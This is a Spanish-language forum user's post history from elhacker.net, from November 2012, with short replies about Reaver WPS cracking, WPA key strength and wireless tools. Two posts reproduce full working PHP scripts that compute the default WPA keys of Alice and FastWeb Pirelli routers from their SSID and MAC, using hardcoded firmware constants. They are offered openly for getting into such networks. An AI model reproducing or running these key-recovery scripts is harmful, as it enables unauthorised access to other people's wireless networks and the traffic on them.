@pepehabana: muy poco necesario abrir otro hilo, el archivo es la mac address 001122334455.wpc si mal no recuerdo, este se guarda en /usr/local/etc/reaver/, si no tienes nada en esa carpeta nunca se va a guardar la sesión de reaver.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#471
Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
14 Noviembre 2012, 17:45 PM #472
Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
14 Noviembre 2012, 00:38 AMCita de: Carpena en 13 Noviembre 2012, 22:11 PM
1.- y en que ruta se guarda????
2.- y cual es el comando para restaurarlo despues?
1.- En el escritorio.
2.- es un modulo, lo pones en la carpeta módulos.
Creo que andaba solo en wifiway, ya que en wifislax había cambiado la dirección donde se guardaba.
#473
Wireless en Linux / Re: Necesito ayuda !! ?como se instala programas a manual en BT5?
13 Noviembre 2012, 17:14 PM
Hay un hilo sobre el tema
http://foro.elhacker.net/wireless_en_linux/wpscrackgui_v120_beta_11112012-t352541.375.html
Pone los repo de ubuntu 11.10 y instala gambas, luego ejecutas tal cual se indica en el post.
http://foro.elhacker.net/wireless_en_linux/wpscrackgui_v120_beta_11112012-t352541.375.html
Pone los repo de ubuntu 11.10 y instala gambas, luego ejecutas tal cual se indica en el post.
#474
Hacking Wireless / Re: sumar wifis
11 Noviembre 2012, 23:18 PM
No podes sumar las lineas, pero si tienes un Mikrotik como yo, puedes balancear la carga entre estas dos.
#475
Hacking Wireless / Re: Como entrar en un Router conectados en una red Lan?
11 Noviembre 2012, 23:17 PM
porque conecta (cruzado) de PC a Router si solo se usa cruzado cuando es de PC a PC y no tanto. Entras con la IP y listo sino fíjate que IP te da o fija un rango para entrar.
#476
Wireless en Linux / Re: Más dudas sobre WPA y WPS
11 Noviembre 2012, 22:28 PMCita de: ctcx en 11 Noviembre 2012, 22:14 PM
Bueno, es que sólo le puedo poner 10 máximo. ¿Aún sería vulnerable de alguna manera?
WPA/WPA2 máximo se pueden poner 64 caracteres. Ya eso indica que el router esta limitado y puede ser bastante vulnerable.
#477
Wireless en Linux / Re: Más dudas sobre WPA y WPS
11 Noviembre 2012, 21:25 PMCita de: ctcx en 11 Noviembre 2012, 20:47 PM
Perdón por la pregunta, ¿pero entonces dónde era el hilo correcto?
Todo se trata de hablar en http://foro.elhacker.net/wireless_en_linux/reaver_vulnerabilidad_de_wpa_por_wps_habilitado-t350507.0.html
Cita de: ctcx en 11 Noviembre 2012, 20:47 PM
Y entonces, si apago el WPS y pongo una clave alfanumérica aleatoria de 10 caracteres (donde se requeriría un diccionario de 3.65 x 10¹⁵ palabras), supongo que ya tengo una red 100% segura...
Ponle 13.-
Cita de: ctcx en 11 Noviembre 2012, 20:47 PM
Y en una segunda y última pregunta por ahora, ¿alguien sabe cómo instalar compat wireless y/o parchar los drivers en openSUSE 12.2? Porque creo que es por eso que las auditorías no me funcionaban tan bien en openSUSE como en Wifislax. Ya mencioné qué adaptadores wifi tengo...
Supongo que se hará igual que cualquier linux: http://www.arg-wireless.com.ar/index.php/topic,995.msg4223.html#msg4223
#478
Hacking Wireless / Alice AGPF WPA Discovery (Saber WPA redes Alice)
11 Noviembre 2012, 21:20 PM
Con este Script podemos saber la Clave WPA por defecto de las redes Alice:
Código [Seleccionar]
<?php
/***************************************************************************
* Alice AGPF WPA Discovery *
* by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net *
* based on <http://wifiresearchers.wordpress.com/> *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/
/*
* Tabella per il calcolo del seriale.
*
* First SSID digits => ( SN1, k, Q )
*/
$SN_TABLE = array( '96' => array( '69102', 13, 96017051 ),
'93' => array( '69101', 13, 92398366 ),
'56' => array( '67902', 13, 54808800 ),
'55' => array( '67904', 8, 55164449 ),
'54' => array( '67903', 8, 52420689 ),
'48' => array( '67903', 8, 47896103 ),
'46' => array( '67902', 13, 39015145 ) );
/*
* Numeri magici da utilizzare per il calcolo dell'SHA256.
*/
$ALIS = "\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8";
/*
* Tabella di conversione da hash a wpa.
*/
$CONV_TABLE = "0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuv".
"wxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz0123";
/*
* SSID della rete.
*/
$SSID = "Alice-96154825";
/*
* MAC address del router.
*/
$MAC = "\x00\x23\x8E\x01\x02\x03";
/*
* Calcolo il seriale in base al SSID e alla tabella dei valori noti.
*/
$SN = SSID2SN($SSID);
/*
* Calcolo SHA256( MagicN + SN + MAC )
*/
$hash = SHA256( $ALIS.$SN.$MAC );
/*
* Converto la stringa dell'hash in un array di byte.
*/
$bytes = hash2bytes($hash);
/*
* Trovo la WPA utilizzando i primi 24 byte dell'hash come indici della tabella di covnersione.
*/
$wpa = "";
for( $i = 0; $i < 24; $i++ ){
$wpa .= $CONV_TABLE[ $bytes[$i] ];
}
echo "WPA : $wpa\n";
/*
* Funzione per risalire al seriale del router partendo dal suo SSID e utilizzando
* le tabelle dei valori noti.
*/
function SSID2SN( $ssid ){
global $SN_TABLE;
/*
* Prelevo il numero intero dall'SSID e ne prendo le prime due cifre
* per verificare che il router sia presente nella tabella.
*/
preg_match_all( "/^Alice\-([0-9]+)/", $ssid, $m );
$ssidn = $m[1][0];
$id = substr( $ssidn, 0, 2 );
if( isset( $SN_TABLE[$id] ) ){
/*
* Ok, il router è presente nella tabella, prelevo la prima parte del seriale e
* le costanti k e Q da utilizzare nell'equazione finale.
*/
$sn1 = $SN_TABLE[$id][0];
$k = $SN_TABLE[$id][1];
$Q = $SN_TABLE[$id][2];
/*
* La seconda parte del seriale equivale a :
* (SSID - Q) / k
*/
$sn2 = ((int)$ssidn - $Q) / $k;
/*
* Restituisco il seriale completo.
*/
return $sn1.'X'.sprintf( "%07s", $sn2 );
}
/*
* Router non presente nella tabella.
*/
else{
die( "La serie 'Alice-$id******' non è presente nella tabella e non è supportata.\n" );
}
}
/*
* Funzione per il calcolo di un hash SHA256.
*/
function SHA256( $phrase ){
return bin2hex( mhash( MHASH_SHA256, $phrase ) );
}
/*
* Funzione per convertire un hash in un array di byte interi.
*/
function hash2bytes( $hash ){
preg_match_all( "/[a-f0-9]{2}/i", $hash, $hash_bytes );
$bytes = array();
foreach( $hash_bytes[0] as $byte ){
$bytes[] = hexdec($byte);
}
return $bytes;
}
?>
#479
Hacking Wireless / FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
11 Noviembre 2012, 21:20 PM
Simple Script para saber la clave WPA por defecto de las redes FASTWEB-1-00193EA1B2C3:
Código [Seleccionar]
<?php
/***************************************************************************
* FastWeb Pirelli WPA Discovery *
* by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/
/*
* SSID di partenza.
*/
$ssid = "FASTWEB-1-00193EA1B2C3";
/*
* 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
*/
$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
* Prelevo la parte finale del SSID.
*/
$sn = split( '-', $ssid );
$sn = $sn[2];
/*
* La divido in gruppi di due caratteri, formando un array
* di 6 rappresentazioni esadecimali di byte.
*/
preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );
$sn_bytes = $sn_bytes[0];
/*
* Inizializzo una stringa con il valore intero di questi byte.
*/
$str = "";
for( $i = 0; $i < 6; $i++ ){
$str .= chr( hexdec( $sn_bytes[$i] ) );
}
echo "$str\n";
/*
* Aggiungo alla stringa i 20 byte "magici".
*/
$str .= $seq_20;
/*
* Ricavo i byte dell'hash md5 della stringa
*/
preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );
$md5_bytes = $md5_bytes[0];
$long = "";
/*
* Converto i byte in sequenze binarie di 8 bit.
*/
foreach( $md5_bytes as $byte ){
$long .= sprintf( "%08s", decbin( hexdec($byte) ) );
}
/*
* Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero
* di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
*/
$hex_5 = array();
for( $i = 0; $i < 25; $i += 5 ){
$n = bindec( substr( $long, $i, 5 ) );
$hex_5[] = $n > 0x0a ? $n + 0x57 : $n;
}
/*
* Compongo la chiave.
*/
$wpa = "";
foreach( $hex_5 as $hex ){
$wpa .= sprintf( "%02x", $hex );
}
print "WPA : $wpa\n";
?>
#480
Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
11 Noviembre 2012, 13:51 PM
@Rumberto Para el viernes seguro terminas! 